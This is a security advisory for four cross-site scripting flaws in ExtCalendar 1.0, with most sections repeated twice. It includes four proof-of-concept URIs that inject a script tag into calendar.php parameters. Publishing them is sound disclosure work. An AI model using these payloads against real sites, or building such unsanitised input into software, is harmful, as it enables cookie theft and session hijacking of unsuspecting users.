ExtCalendar Cross-Site Scripting Vulnerabilities
BID:17146
Info
ExtCalendar Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 17146 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 18 2006 12:00AM |
| Updated: | Mar 20 2006 09:24PM |
| Credit: | [email protected] is credited with discovery. |
| Vulnerable: |
ExtCalendar ExtCalendar 1.0 |
| Not Vulnerable: |
ExtCalendar ExtCalendar 2.0 |
Discussion
ExtCalendar Cross-Site Scripting Vulnerabilities
ExtCalendar is prone to four cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
ExtCalendar is prone to four cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
ExtCalendar Cross-Site Scripting Vulnerabilities
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>
http://www.example.com/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006
http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script>
http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>
http://www.example.com/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006
http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script>
http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>
Solution / Fix
ExtCalendar Cross-Site Scripting Vulnerabilities
Solution:
This issue is reportedly addressed in ExtCalendar 2.0. Symantec has not confirmed this fix. Affected users are advised to contact the vendor for further information.
Solution:
This issue is reportedly addressed in ExtCalendar 2.0. Symantec has not confirmed this fix. Affected users are advised to contact the vendor for further information.